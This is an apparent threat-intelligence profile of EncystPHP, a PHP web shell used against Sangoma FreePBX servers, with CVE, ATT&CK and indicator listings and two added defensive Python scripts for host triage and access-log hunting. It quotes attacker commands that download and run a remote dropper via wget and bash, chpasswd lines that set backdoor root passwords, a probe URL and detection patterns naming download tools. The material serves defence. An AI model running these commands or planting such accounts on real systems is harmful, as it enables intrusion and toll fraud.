EncystPHP

Malware. Used by 1 actor. Exploits 3 CVEs.

EncystPHP is a PHP web shell targeting Sangoma FreePBX/Endpoint Manager environments. It has been observed since early December 2025 in campaigns exploiting CVE-2025-64328, a post-authentication command injection vulnerability in FreePBX, to gain execution as the asterisk user and deploy persistent web shells on internet-exposed VoIP/PBX servers. FortiGuard Labs named the malware EncystPHP and linked the activity to the financially motivated INJ3CTOR3 operation, which has a history of targeting VoIP infrastructure for toll fraud and related abuse.

High-confidence reported capabilities include remote command execution, persistence, and deployment of additional web shells/payloads. EncystPHP masquerades as legitimate FreePBX files, notably ajax.php, and in some reports presents an operator interface titled "Ask Master." It can enumerate the filesystem and processes, query active Asterisk channels, list SIP peers, and retrieve FreePBX and Elastix configuration files. Reported post-compromise actions include harvesting database configuration from /etc/freepbx.conf, creating a root-level local account named newfpbx with UID 0, resetting multiple account passwords, escalating privileges, injecting SSH public keys, modifying configuration to keep SSH port 22 open, deleting cron jobs and user accounts, removing competing web shells, deleting the Endpoint Manager module, restoring permissions to avoid service exceptions, and tampering with or deleting logs and temporary files for defense evasion.

Persistence is established through cron-based re-download and execution of additional droppers, including retrieval of k.php from 45.234.176.202 (crm.razatelefonia.pro). The malware and associated droppers were reported as Base64-encoded and decoded at runtime, with web shell copies placed across multiple web-accessible paths under the FreePBX web tree. Fortinet reported detections as PHP/EncystPHP.A!tr and BASH/EncystPHP.A!tr.
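The three host-level persistence artifacts described above (a second UID 0 account, a cron entry that re-downloads and executes a dropper every minute, and injected SSH public keys) are the ones a responder checks first on a suspect FreePBX box. The following triage helper is an added example written for this page, not code from Fortinet, SANS or the FreePBX project. It runs against the text of /etc/passwd, a crontab and an authorized_keys file; the sample inputs, the baseline key set and the function names are mine, and the key blobs are placeholders rather than real keys.

```python
import re

# Infrastructure named in the reporting summarised on this page.
KNOWN_BAD_IPS = {"45.234.176.202", "45.95.147.178"}
URL_RE = re.compile(r'https?://(?P<host>[^/\s:]+)')
FETCH_RE = re.compile(r'\b(?:wget|curl)\b')
# An interpreter invoked after a command separator, e.g. ";bash /tmp/k" or "| sh".
EXEC_AFTER_SEP_RE = re.compile(r'(?:;|&&|\|\|?)\s*(?:bash|sh|php|python3?|perl)\b')

def find_rogue_uid0(passwd_text):
    """Accounts other than root with UID 0 (the reporting describes 'newfpbx')."""
    rogue = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            rogue.append(fields[0])
    return rogue

def find_fetch_and_exec_cron(crontab_text):
    """Cron entries that download over HTTP and run the result, or that pull from reported infrastructure."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:  # @reboot-style or malformed entries are not handled here
            continue
        command = fields[5]
        url = URL_RE.search(command)
        if not url or not FETCH_RE.search(command):
            continue
        host = url.group("host")
        if EXEC_AFTER_SEP_RE.search(command) or host in KNOWN_BAD_IPS:
            hits.append({"schedule": " ".join(fields[:5]), "host": host, "command": command})
    return hits

def find_unbaselined_keys(authorized_keys_text, baseline_blobs):
    """authorized_keys entries whose key blob is not in the known-good baseline."""
    hits = []
    for line in authorized_keys_text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        # Skip any leading options (e.g. command="...") and locate the key type token.
        for i, tok in enumerate(tokens):
            if tok.startswith(("ssh-", "ecdsa-", "sk-")):
                break
        else:
            continue
        blob = tokens[i + 1] if i + 1 < len(tokens) else ""
        if blob not in baseline_blobs:
            hits.append({"type": tokens[i], "comment": " ".join(tokens[i + 2:])})
    return hits

def triage(passwd_text, crontab_text, authorized_keys_text, baseline_blobs):
    """Run all three checks and return the findings as one dict."""
    return {
        "rogue_uid0": find_rogue_uid0(passwd_text),
        "fetch_exec_cron": find_fetch_and_exec_cron(crontab_text),
        "unbaselined_keys": find_unbaselined_keys(authorized_keys_text, baseline_blobs),
    }

# Constructed sample data (not taken from a real host). The wget cron line mirrors
# the every-minute k.php re-download described in the reporting.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "asterisk:x:995:992::/var/lib/asterisk:/sbin/nologin\n"
    "newfpbx:x:0:0::/home/newfpbx:/bin/bash\n"
)
SAMPLE_CRONTAB = (
    "# m h dom mon dow command\n"
    "0 2 * * * /usr/bin/find /var/spool/asterisk/monitor -mtime +30 -delete\n"
    "* * * * * wget http://45.234.176.202/new/k.php -O /tmp/k;bash /tmp/k\n"
    "30 3 * * * curl -s https://mirror.example.net/updates.txt -o /var/tmp/updates.txt\n"
)
# Placeholder blobs for the example; these are not valid public keys.
BASELINE_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIBASELINEKEYPLACEHOLDER000000000000000000"}
SAMPLE_AUTHORIZED_KEYS = (
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBASELINEKEYPLACEHOLDER000000000000000000 ops@jump\n"
    'command="/bin/true" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIUNKNOWNKEYPLACEHOLDER0000000000000000000 backdoor\n'
)

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PASSWD, SAMPLE_CRONTAB, SAMPLE_AUTHORIZED_KEYS, BASELINE_BLOBS), indent=2))
```

On a live system the baseline of key blobs should come from configuration management or a golden image, not from the host under investigation, and the crontab check needs to cover every user's crontab plus /etc/cron.d, since the reporting does not say which account's crontab carried the entry.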

Observed indicators and infrastructure directly mentioned in reporting include 45.234.176.202, crm.razatelefonia.pro, hxxp://45.234.176.202/new/c, hxxp://45.234.176.202/new/k.php, and scanning/probing associated with 160.119.76.250. One observed web shell access pattern used a GET request to /admin/modules/phones/ajax.php with an md5 parameter carrying the hard-coded string cf710203400b8c466e6dfcafcf36a411; SANS ISC noted that the shell compares this value as a plain string and never treats it as an MD5 digest, so the parameter name is misleading and the token behaves as a static password that can be matched verbatim in web server access logs. EncystPHP has been widely reported in compromises of vulnerable FreePBX systems, with more than 900 infected FreePBX servers observed during the campaign wave.
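Because the md5 token is a fixed string sent in the query, the access pattern above can be hunted directly in web server access logs. The script below is an added example for this page, not code from Fortinet, SANS or Mallory. It keys on the hard-coded token (high confidence), on any ajax.php being called with an md5= parameter at all (assumption: legitimate FreePBX traffic to ajax.php does not carry such a parameter; tune against your own baseline), on the restapps probe path quoted from the SANS ISC diary further down this page, and on the source IPs named in this page's reporting. The log lines are constructed for the example and the function names are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hard-coded token seen in the md5 parameter (SANS ISC, quoted on this page).
ENCYSTPHP_MD5_TOKEN = "cf710203400b8c466e6dfcafcf36a411"
# Infrastructure named in the reporting summarised on this page.
KNOWN_BAD_IPS = {"45.234.176.202", "160.119.76.250", "45.95.147.178"}
# Probe path quoted from the SANS ISC diary (restapps, the CVE-2021-45461 surface).
RESTAPPS_PROBE = "/restapps/applications.php"

# Apache/nginx "combined" access-log format; trailing referer/UA fields are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Parse one combined-format line into a dict; return None on a malformed line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec

def classify(rec):
    """Return (severity, reason) for a suspicious request, or None for a clean one."""
    md5_vals = rec["query"].get("md5", [])
    if ENCYSTPHP_MD5_TOKEN in md5_vals:
        return ("high", "EncystPHP hard-coded md5 token")
    if rec["path"].endswith("/ajax.php") and md5_vals:
        # Shell copies are dropped as ajax.php under several web paths, so an md5=
        # parameter on any ajax.php is worth a look (assumption: not used by
        # legitimate FreePBX traffic; verify against your own baseline).
        return ("medium", "ajax.php called with md5= parameter")
    if rec["path"].startswith(RESTAPPS_PROBE):
        return ("medium", "restapps probe path")
    if rec["ip"] in KNOWN_BAD_IPS:
        return ("low", "source IP named in reporting")
    return None

def hunt(lines):
    """Run classify() over raw log lines; return one finding per suspicious request."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec)
        if verdict is not None:
            findings.append({
                "ip": rec["ip"], "path": rec["path"], "status": rec["status"],
                "severity": verdict[0], "reason": verdict[1],
            })
    return findings

# Constructed sample log (not real telemetry). The first line mirrors the access
# pattern quoted above, the third mirrors the restapps probe from the SANS diary.
SAMPLE_LOG = [
    '160.119.76.250 - - [13/Apr/2026:08:12:01 +0000] "GET /admin/modules/phones/ajax.php?md5=cf710203400b8c466e6dfcafcf36a411 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [13/Apr/2026:08:12:07 +0000] "GET /admin/config.php?display=dashboard HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '45.95.147.178 - - [13/Apr/2026:08:12:09 +0000] "GET /restapps/applications.php?linestate=$$LINESTATE$$&user=100 HTTP/1.1" 404 196 "-" "curl/8.0"',
    '203.0.113.7 - - [13/Apr/2026:08:13:00 +0000] "GET /admin/ajax.php?md5=0123456789abcdef HTTP/1.1" 200 20 "-" "python-requests/2.31"',
    '10.0.0.5 - - [13/Apr/2026:08:13:30 +0000] "POST /admin/ajax.php?module=core&command=getJSON HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} {f['path']} ({f['status']}): {f['reason']}")
```

A 200 response to the token request is the strongest signal, since a shell that is not there answers 404; the medium-severity hits are where the baseline tuning matters.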


EXPLOITED CVES

Vulnerabilities exploited

3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

CVE-2025-64328: OS Command Injection in Sangoma FreePBX Endpoint Manager Filestore Module (exploited in the wild)

A sophisticated attack campaign leveraging a critical FreePBX vulnerability to deploy a persistent webshell dubbed “EncystPHP,” enabling threat actors to gain complete administrative control over compromised VoIP systems.

via Cyber Security News (cybersecuritynews.com)
CVE-2021-45461: RCE in FreePBX Rest Phone Apps (restapps) (exploited in the wild)

As recently as last week, Fortinet revealed the threat actor behind the activity has weaponized CVE-2025-64328 starting early December 2025 to deliver a web shell codenamed EncystPHP. | In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461. These incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web shell in the target environments.

via The Hacker News (thehackernews.com)
CVE-2019-19006: Sangoma FreePBX Improper Authentication Vulnerability

FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment.

via Fortinet Threat Research (fortinet.com)
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
INJ3CTOR3

Prior campaign generations were documented by Check Point Research in 2020, Palo Alto Unit 42 in 2022, and Fortinet in January 2026.

via Cyber Security News (cybersecuritynews.com)
MITRE ATT&CK

Techniques & procedures

29 distinct techniques documented for this family, grouped by tactic (the Stealth, Defense Impairment and Other groupings below collect techniques that ATT&CK places under Defense Evasion).

Initial Access

2 techniques
T1078 Valid Accounts (evidence: 2)

This version is also adding the following backdoor accounts...

T1190 Exploit Public-Facing Application (evidence: 5)

"...exploits CVE-2025-64328, a post-authentication command-injection flaw in the FreePBX Endpoint Manager’s administrative interface... allows authenticated attackers to execute arbitrary shell commands as the asterisk user..."

Execution

4 techniques
T1053.003 Cron (evidence: 2)

"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."

T1059 Command and Scripting Interpreter (evidence: 2)

By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges, enabling arbitrary command execution on the compromised host...

T1059.004 Unix Shell (evidence: 4)

Application: system data: wget http://45.95.147.178/k.php -O /tmp/k;bash /tmp/ k

T1203 Exploitation for Client Execution (evidence: 1)

The same IP address is also probing for various FreePBX vulnerabilities, for example: /restapps/applications.php?linestate=$$LINESTATE$$&user=100 ... Application: system data: wget http://45.95.147.178/k.php -O /tmp/k;bash /tmp/ k

Persistence

7 techniques
T1053.003 Cron (evidence: 2)

"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."

T1078 Valid Accounts (evidence: 2)

This version is also adding the following backdoor accounts...

T1098 Account Manipulation (evidence: 1)

"...resets multiple user account passwords to a single value, and injects SSH public keys to maintain backdoor access."

T1098.004 SSH Authorized Keys (evidence: 2)

"...injects SSH public keys to maintain backdoor access."

T1136 Create Account (evidence: 2)

This version is also adding the following backdoor accounts: echo 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e ... echo 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e

T1505.003 Web Shell (evidence: 6)

Today, I noticed some scans for what appears to be the "EncystPHP" web shell... It appears to be a favorite among attackers compromising vulnerable FreePBX systems.

T1556 Modify Authentication Process (evidence: 1)

"The webshell employs MD5-hashed authentication, comparing plaintext passwords entered via the web interface against hard-coded hash values embedded in the code."

Privilege Escalation

5 techniques
T1053.003 Cron (evidence: 2)

"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."

T1068 Exploitation for Privilege Escalation (evidence: 1)

“By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges…”

T1078 Valid Accounts (evidence: 2)

This version is also adding the following backdoor accounts...

T1098 Account Manipulation (evidence: 1)

"...resets multiple user account passwords to a single value, and injects SSH public keys to maintain backdoor access."

T1098.004 SSH Authorized Keys (evidence: 2)

"...injects SSH public keys to maintain backdoor access."

Stealth

7 techniques
T1036 Masquerading (evidence: 1)

"By mimicking legitimate FreePBX components, it attempts to 'evade immediate detection'"

T1036.005 Match Legitimate Resource Name or Location (evidence: 1)

“written to disk, masquerading as a legitimate FreePBX file named ajax.php… [and] forges timestamps to match those of legitimate files”

T1070 Indicator Removal (evidence: 1)

"EncystPHP also tampers with log files and disables error reporting to hinder forensic analysis and detection efforts."

T1070.002 Clear Linux or Mac System Logs (evidence: 1)

"...and sed to scrub logs."

T1070.004 File Deletion (evidence: 1)

"The malware also attempts to cover its tracks, executing commands like rm -rf /tmp/* to delete temporary files"

T1070.006 Timestomp (evidence: 1)

"The malware forges timestamps to match legitimate files..."

T1078 Valid Accounts (evidence: 2)

This version is also adding the following backdoor accounts...

Defense Impairment

2 techniques
T1222 File and Directory Permissions Modification (evidence: 1)

"Upon deployment, the malware modifies file permissions of legitimate FreePBX components to prevent detection..."

T1556 Modify Authentication Process (evidence: 1)

"The webshell employs MD5-hashed authentication, comparing plaintext passwords entered via the web interface against hard-coded hash values embedded in the code."

Credential Access

2 techniques
T1003 OS Credential Dumping (evidence: 1)

“attempts to collect database configuration information from /etc/freepbx.conf”

T1556 Modify Authentication Process (evidence: 1)

"The webshell employs MD5-hashed authentication, comparing plaintext passwords entered via the web interface against hard-coded hash values embedded in the code."

Discovery

4 techniques
T1057 Process Discovery (evidence: 1)

"...predefined operational commands for... process inspection..."

T1082 System Information Discovery (evidence: 1)

The web shell also exposes an interactive interface that supports several predefined operational commands. This includes file system enumeration, process inspection... and retrieving multiple FreePBX and Elastix configuration files.

T1083 File and Directory Discovery (evidence: 1)

"...predefined operational commands for file system enumeration... retrieving FreePBX and Elastix configuration files."

T1087 Account Discovery (evidence: 1)

The web shell also exposes an interactive interface that supports several predefined operational commands... listing Asterisk SIP peers...

Lateral Movement

1 technique
T1021.004 SSH (evidence: 2)

"...modifies system configurations to ensure SSH port 22 remains open... injects SSH public keys to maintain backdoor access."

Command and Control

2 techniques
T1071.001 Web Protocols (evidence: 2)

"...downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202..."

T1105 Ingress Tool Transfer (evidence: 3)

"Fortinet observed that the attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202... redirected to another dropper named k.php."

Impact

1 technique
T1496 Resource Hijacking (evidence: 1)

“enabling arbitrary command execution… and initiating outbound call activity through the PBX environment.”

Other

1 technique
T1562.001 Disable or Modify Tools (evidence: 1)

“searches for PHP files associated with web shells… and deletes all matching files… [and] disables error reporting”

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups: 5 network indicators (IPs, domains, and DNS infrastructure linked to this family), 6 file hashes (MD5, SHA-1, SHA-256) from samples and reports, and 3 other indicator types observed in public reporting. The preview lists three IPv4 addresses, one MD5 hash, one URI and one domain, last sighted between one and four months ago. Full values are available in Mallory; those published in open reporting are given in the description above.
ACTIVITY FEED

Recent activity

13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

Cyber Security News (news), May 22, 2026
Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems

A prior campaign malware/dropper associated with the same FreePBX-focused toll fraud activity. The content references the January 2026 EncystPHP campaign and its dropper as an earlier generation preceding JOMANGY.
SANS ISC Handler's Diary (news), Apr 13, 2026
Scans for EncystPHP Webshell - SANS Internet Storm Center

A web shell used by attackers compromising vulnerable FreePBX systems. It is accessed via a hard-coded string passed in the misleading "md5" parameter, and observed variants also add multiple backdoor accounts to the compromised host.
SC World (news), Mar 2, 2026
Hundreds of FreePBX instances infected by web shells exploiting command injection vulnerability | brief | SC Media

A web shell deployed onto vulnerable Sangoma FreePBX instances to enable remote command execution and persistent unauthorized access, reportedly running with elevated privileges.
Security Affairs (news), Mar 1, 2026
CVE-2025-64328 exploitation impacts 900 Sangoma FreePBX instances

A PHP web shell/dropper deployed after exploitation of CVE-2025-64328 in Sangoma FreePBX. Provides remote command execution and persistence, deploys additional web shells/payloads, performs system manipulation (e.g., locking key files, harvesting DB configs, deleting cron jobs and user accounts, removing rival web shells), establishes long-term access (creates root-level user, resets passwords, injects SSH key, keeps SSH/22 open), and conducts defense evasion (erases logs, restores permissions, removes the Endpoint Manager module).